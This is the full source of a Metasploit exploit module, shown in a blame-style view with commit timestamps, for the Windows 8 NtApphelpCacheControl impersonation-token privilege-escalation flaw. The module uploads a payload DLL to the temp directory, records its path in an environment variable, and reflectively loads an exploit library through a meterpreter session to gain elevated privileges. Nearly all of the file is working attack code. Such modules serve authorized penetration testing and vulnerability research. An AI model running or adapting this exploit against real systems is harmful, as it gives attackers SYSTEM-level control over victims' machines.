2015-01-02 17:31:28 +00:00
|
|
|
##
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'msf/core/post/windows/reflective_dll_injection'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Local
|
2015-01-08 20:13:14 +00:00
|
|
|
Rank = NormalRanking
|
2015-01-02 17:31:28 +00:00
|
|
|
|
2015-01-08 23:57:14 +00:00
|
|
|
include Exploit::EXE
|
2015-01-02 17:31:28 +00:00
|
|
|
include Msf::Post::File
|
|
|
|
include Msf::Post::Windows::Priv
|
|
|
|
include Msf::Post::Windows::ReflectiveDLLInjection
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info, {
|
|
|
|
'Name' => 'Windows NtApphelpCacheControl Token Impersonation',
|
|
|
|
'Description' => %q{
|
|
|
|
On Windows 8, the system call NtApphelpCacheControl (the code is actually in ahcache.sys)
|
2015-01-08 20:13:14 +00:00
|
|
|
allows application compatibility data to be cached for quick reuse when new processes are
|
|
|
|
created. A normal user can query the cache but cannot add new cached entries as the
|
|
|
|
operation is restricted to administrators. This is checked in the function
|
|
|
|
AhcVerifyAdminContext.
|
|
|
|
|
|
|
|
This function has a vulnerability where it doesn't correctly check the impersonation token
|
|
|
|
of the caller to determine if the user is an administrator. It reads the caller's
|
|
|
|
impersonation token using PsReferenceImpersonationToken and then does a comparison between
|
|
|
|
the user SID in the token to LocalSystem's SID. It doesn't check the impersonation level
|
|
|
|
of the token so it's possible to get an identify token on your thread from a local system
|
|
|
|
process and bypass this check.
|
2015-01-02 17:31:28 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'James Forshaw',
|
|
|
|
'sinn3r'
|
|
|
|
],
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
'Platform' => 'win',
|
|
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
|
|
'DefaultOptions' =>
|
|
|
|
{
|
|
|
|
'EXITFUNC' => 'thread',
|
|
|
|
},
|
|
|
|
'Targets' =>
|
|
|
|
[
|
|
|
|
[ 'Windows 8', { } ]
|
|
|
|
],
|
|
|
|
'Payload' =>
|
|
|
|
{
|
|
|
|
'Space' => 4096,
|
|
|
|
'DisableNops' => true
|
|
|
|
},
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
[ 'OSVEB', '116497' ],
|
|
|
|
[ 'URL', 'https://code.google.com/p/google-security-research/issues/detail?id=118']
|
|
|
|
],
|
|
|
|
'DisclosureDate' => 'Sep 30 2014',
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
}))
|
|
|
|
end
|
|
|
|
|
2015-01-08 23:18:14 +00:00
|
|
|
def temp
|
|
|
|
@temp ||= get_env('TEMP').to_s
|
|
|
|
end
|
|
|
|
|
2015-01-09 00:33:30 +00:00
|
|
|
def env_var_name
|
|
|
|
# If you want to change this, make sure you change the one in exploit.cpp too
|
|
|
|
'PAYLOAD_PATH'
|
|
|
|
end
|
|
|
|
|
2015-01-08 20:13:14 +00:00
|
|
|
def upload_payload_dll(payload_filepath)
|
|
|
|
payload = generate_payload_dll({:dll_exitprocess => true})
|
|
|
|
begin
|
|
|
|
write_file(payload_filepath, payload)
|
|
|
|
rescue Rex::Post::Meterpreter::RequestError => e
|
|
|
|
fail_with(
|
2015-01-08 23:57:14 +00:00
|
|
|
Failure::Unknown,
|
2015-01-08 20:13:14 +00:00
|
|
|
"Error uploading file #{payload_filepath}: #{e.class} #{e}"
|
|
|
|
)
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def set_filepath_env(payload_filepath)
|
2015-01-09 00:33:30 +00:00
|
|
|
ret = session.railgun.kernel32.SetEnvironmentVariableA(env_var_name, payload_filepath)
|
|
|
|
if !ret['return']
|
|
|
|
fail_with(Failure::Unknown, "Failed to set environment variable #{env_var_name}")
|
|
|
|
end
|
2015-01-08 20:13:14 +00:00
|
|
|
end
|
|
|
|
|
2015-01-08 23:18:14 +00:00
|
|
|
def upload_payload
|
2015-01-09 03:25:55 +00:00
|
|
|
payload_filepath = "#{temp}\\#{Rex::Text.rand_text_alpha(6)}.dll"
|
2015-01-08 23:18:14 +00:00
|
|
|
|
|
|
|
# Save the payload DLL's file path so the exploit can find it
|
|
|
|
set_filepath_env(payload_filepath)
|
|
|
|
|
|
|
|
# Upload the payload
|
|
|
|
upload_payload_dll(payload_filepath)
|
|
|
|
if !file?(payload_filepath)
|
2015-01-09 03:25:55 +00:00
|
|
|
fail_with(Failure::Unknown, "Failed to save the payload DLL, or got removed. No idea why.")
|
2015-01-08 23:18:14 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def upload_exploit
|
|
|
|
lib_file_path = ::File.join(
|
|
|
|
Msf::Config.data_directory, "exploits", "ntapphelpcachecontrol", "exploit.dll"
|
|
|
|
)
|
2015-01-02 17:31:28 +00:00
|
|
|
|
2015-01-07 16:39:46 +00:00
|
|
|
session.core.load_library(
|
2015-01-08 23:18:14 +00:00
|
|
|
'LibraryFilePath' => lib_file_path,
|
2015-01-09 03:25:55 +00:00
|
|
|
'TargetFilePath' => "#{temp}\\#{Rex::Text.rand_text_alpha(5)}.dll",
|
2015-01-07 16:39:46 +00:00
|
|
|
'UploadLibrary' => true,
|
|
|
|
'Extension' => false,
|
|
|
|
'SaveToDisk' => false
|
|
|
|
)
|
2015-01-08 23:18:14 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
print_status("Uploading the payload DLL")
|
|
|
|
upload_payload
|
|
|
|
|
|
|
|
print_status("Loading Exploit Library")
|
|
|
|
upload_exploit
|
|
|
|
end
|
2015-01-02 17:31:28 +00:00
|
|
|
|
2015-01-08 23:57:14 +00:00
|
|
|
def cleanup
|
2015-01-09 00:33:30 +00:00
|
|
|
session.railgun.kernel32.SetEnvironmentVariableA(env_var_name, nil)
|
2015-01-08 23:57:14 +00:00
|
|
|
super
|
|
|
|
end
|
|
|
|
|
2015-01-02 17:31:28 +00:00
|
|
|
end
|